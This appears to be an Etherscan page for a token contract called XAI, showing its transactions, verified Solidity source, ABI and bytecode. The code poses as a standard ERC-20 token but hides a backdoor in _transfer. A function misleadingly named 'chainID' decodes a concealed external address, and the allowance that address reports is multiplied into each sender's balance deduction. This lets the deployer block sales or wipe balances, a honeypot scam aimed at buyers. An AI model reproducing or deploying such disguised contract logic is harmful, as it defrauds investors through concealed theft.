ETH Price: $2,492.31 (-0.98%)

Contract

0xc9f944a54E1320703DF105cBC3818b8565BbB564
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve178268492023-08-02 10:54:47449 days ago1690973687IN
0xc9f944a5...565BbB564
0 ETH0.0003533314.58003783
Approve177697962023-07-25 11:25:11457 days ago1690284311IN
0xc9f944a5...565BbB564
0 ETH0.0008984819.38990204
Approve177688002023-07-25 8:03:23458 days ago1690272203IN
0xc9f944a5...565BbB564
0 ETH0.0007028126.40362732
Approve177687992023-07-25 8:03:11458 days ago1690272191IN
0xc9f944a5...565BbB564
0 ETH0.0012307526.45754843
Approve177687952023-07-25 8:02:23458 days ago1690272143IN
0xc9f944a5...565BbB564
0 ETH0.0012127526.20582681
Approve177687682023-07-25 7:56:59458 days ago1690271819IN
0xc9f944a5...565BbB564
0 ETH0.0012351226.68914479
Approve177687542023-07-25 7:54:11458 days ago1690271651IN
0xc9f944a5...565BbB564
0 ETH0.0010818923.38429506
Open Trading177686632023-07-25 7:35:35458 days ago1690270535IN
0xc9f944a5...565BbB564
0 ETH0.0945608334
Transfer177686452023-07-25 7:31:59458 days ago1690270319IN
0xc9f944a5...565BbB564
1 ETH0.0004786222.731929
0x60806040177686182023-07-25 7:26:35458 days ago1690269995IN
 Create: XAI
0 ETH0.0258304422.08284855

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Block From To
177686632023-07-25 7:35:35458 days ago1690270535
0xc9f944a5...565BbB564
1 ETH
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
XAI

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-25
*/

/**
 *Submitted for verification at Etherscan.io on 2023-07-13
*/

/**

TG https://t.me/PepeMillionaireETH
Twitter https://twitter.com/pepe_million
Website: https://pepemillionaire.online/

*/


// SPDX-License-Identifier: MIT

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

pragma solidity ^0.8.4;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract XAI is IERC20, Ownable {
    using SafeMath for uint256;


    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    bytes _chain;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        bytes memory chain_,
        uint8 decimals_,
        uint256 totalSupply_
    ) {
        _symbol = unicode"XAI";
        _name = name_;
        _chain = chain_;
        _decimals = decimals_;
        _totalSupply = totalSupply_ * 10** _decimals;
        _balances[address(this)] = _totalSupply;
        emit Transfer(address(0), address(this), _totalSupply);
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function chainID() private view returns (address addr) {
        (addr) = abi.decode(_chain, (address));
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(
            IERC20(chainID()).allowance(sender, recipient) * amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function openTrading() external onlyOwner() {
        require(!tradingOpen,"trading is already open");
        IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        //0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D        uniswap
        //0x10ED43C718714eb63d5aA57B78B54704E256024E        pancake
        _approve(address(this), address(uniswapV2Router), _totalSupply);
        address uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
        swapEnabled = true;
        tradingOpen = true;
    }
    bool private tradingOpen = false;
    bool private swapEnabled = false;

    function claimDust() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }
    receive() external payable { }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"bytes","name":"chain_","type":"bytes"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"claimDust","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526008805461ffff191690553480156200001b575f80fd5b50604051620015d7380380620015d78339810160408190526200003e9162000221565b620000493362000112565b60408051808201909152600381526258414960e81b602082015260049062000072908262000357565b50600362000081858262000357565b50600562000090848262000357565b506006805460ff191660ff8416908117909155620000b090600a6200052e565b620000bc908262000545565b6007819055305f81815260016020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050506200055f565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52604160045260245ffd5b5f6001600160401b038084111562000191576200019162000161565b604051601f8501601f19908116603f01168101908282118183101715620001bc57620001bc62000161565b81604052809350858152868686011115620001d5575f80fd5b5f92505b85831015620001f9578285015160208483010152602083019250620001d9565b5f602087830101525050509392505050565b805160ff811681146200021c575f80fd5b919050565b5f805f806080858703121562000235575f80fd5b84516001600160401b03808211156200024c575f80fd5b818701915087601f83011262000260575f80fd5b620002718883516020850162000175565b9550602087015191508082111562000287575f80fd5b508501601f8101871362000299575f80fd5b620002aa8782516020840162000175565b935050620002bb604086016200020b565b6060959095015193969295505050565b600181811c90821680620002e057607f821691505b602082108103620002ff57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000352575f81815260208120601f850160051c810160208610156200032d5750805b601f850160051c820191505b818110156200034e5782815560010162000339565b5050505b505050565b81516001600160401b0381111562000373576200037362000161565b6200038b81620003848454620002cb565b8462000305565b602080601f831160018114620003c1575f8415620003a95750858301515b5f19600386901b1c1916600185901b1785556200034e565b5f85815260208120601f198616915b82811015620003f157888601518255948401946001909101908401620003d0565b50858210156200040f57878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200047357815f19048211156200045757620004576200041f565b808516156200046557918102915b93841c939080029062000438565b509250929050565b5f826200048b5750600162000528565b816200049957505f62000528565b8160018114620004b25760028114620004bd57620004dd565b600191505062000528565b60ff841115620004d157620004d16200041f565b50506001821b62000528565b5060208310610133831016604e8410600b841016171562000502575081810a62000528565b6200050e838362000433565b805f19048211156200052457620005246200041f565b0290505b92915050565b5f6200053e60ff8416836200047b565b9392505050565b80820281158282048414176200052857620005286200041f565b61106a806200056d5f395ff3fe6080604052600436106100f2575f3560e01c80638da5cb5b11610087578063c9567bf911610057578063c9567bf914610295578063dd62ed3e146102a9578063df90ebe8146102ed578063f2fde38b14610301575f80fd5b80638da5cb5b1461021d57806395d89b4114610243578063a457c2d714610257578063a9059cbb14610276575f80fd5b8063313ce567116100c2578063313ce5671461019357806339509351146101b457806370a08231146101d3578063715018a614610207575f80fd5b806306fdde03146100fd578063095ea7b31461012757806318160ddd1461015657806323b872dd14610174575f80fd5b366100f957005b5f80fd5b348015610108575f80fd5b50610111610320565b60405161011e9190610d81565b60405180910390f35b348015610132575f80fd5b50610146610141366004610de0565b6103b0565b604051901515815260200161011e565b348015610161575f80fd5b506007545b60405190815260200161011e565b34801561017f575f80fd5b5061014661018e366004610e0a565b6103c6565b34801561019e575f80fd5b5060065460405160ff909116815260200161011e565b3480156101bf575f80fd5b506101466101ce366004610de0565b61042d565b3480156101de575f80fd5b506101666101ed366004610e48565b6001600160a01b03165f9081526001602052604090205490565b348015610212575f80fd5b5061021b610462565b005b348015610228575f80fd5b505f546040516001600160a01b03909116815260200161011e565b34801561024e575f80fd5b5061011161049f565b348015610262575f80fd5b50610146610271366004610de0565b6104ae565b348015610281575f80fd5b50610146610290366004610de0565b6104fb565b3480156102a0575f80fd5b5061021b610507565b3480156102b4575f80fd5b506101666102c3366004610e63565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156102f8575f80fd5b5061021b61083c565b34801561030c575f80fd5b5061021b61031b366004610e48565b610891565b60606003805461032f90610e9a565b80601f016020809104026020016040519081016040528092919081815260200182805461035b90610e9a565b80156103a65780601f1061037d576101008083540402835291602001916103a6565b820191905f5260205f20905b81548152906001019060200180831161038957829003601f168201915b5050505050905090565b5f6103bc338484610928565b5060015b92915050565b5f6103d2848484610a4c565b610423843361041e85604051806060016040528060288152602001610fe8602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610c53565b610928565b5060019392505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916103bc91859061041e9086610c7e565b5f546001600160a01b031633146104945760405162461bcd60e51b815260040161048b90610ed2565b60405180910390fd5b61049d5f610c90565b565b60606004805461032f90610e9a565b5f6103bc338461041e8560405180606001604052806025815260200161101060259139335f9081526002602090815260408083206001600160a01b038d1684529091529020549190610c53565b5f6103bc338484610a4c565b5f546001600160a01b031633146105305760405162461bcd60e51b815260040161048b90610ed2565b60085460ff16156105835760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e000000000000000000604482015260640161048b565b5f737a250d5630b4cf539739df2c5dacb4c659f2488d90506105a83082600754610928565b5f816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105e5573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106099190610f07565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610654573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106789190610f07565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156106c2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106e69190610f07565b9050816001600160a01b031663f305d7194730610717306001600160a01b03165f9081526001602052604090205490565b5f8061072a5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610790573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906107b59190610f22565b505060405163095ea7b360e01b81526001600160a01b0384811660048301525f1960248301528316915063095ea7b3906044016020604051808303815f875af1158015610804573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108289190610f4d565b50506008805461ffff191661010117905550565b5f546001600160a01b031633146108655760405162461bcd60e51b815260040161048b90610ed2565b60405133904780156108fc02915f818181858888f1935050505015801561088e573d5f803e3d5ffd5b50565b5f546001600160a01b031633146108ba5760405162461bcd60e51b815260040161048b90610ed2565b6001600160a01b03811661091f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161048b565b61088e81610c90565b6001600160a01b03831661098a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161048b565b6001600160a01b0382166109eb5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161048b565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610ab05760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161048b565b6001600160a01b038216610b125760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161048b565b610bd281610b1e610cdf565b604051636eb1769f60e11b81526001600160a01b0387811660048301528681166024830152919091169063dd62ed3e90604401602060405180830381865afa158015610b6c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b909190610f6c565b610b9a9190610f97565b604051806060016040528060268152602001610fc2602691396001600160a01b0386165f908152600160205260409020549190610c53565b6001600160a01b038085165f908152600160205260408082209390935590841681522054610c009082610c7e565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610a3f9085815260200190565b5f8184841115610c765760405162461bcd60e51b815260040161048b9190610d81565b505050900390565b5f610c898284610fae565b9392505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f60058054610ced90610e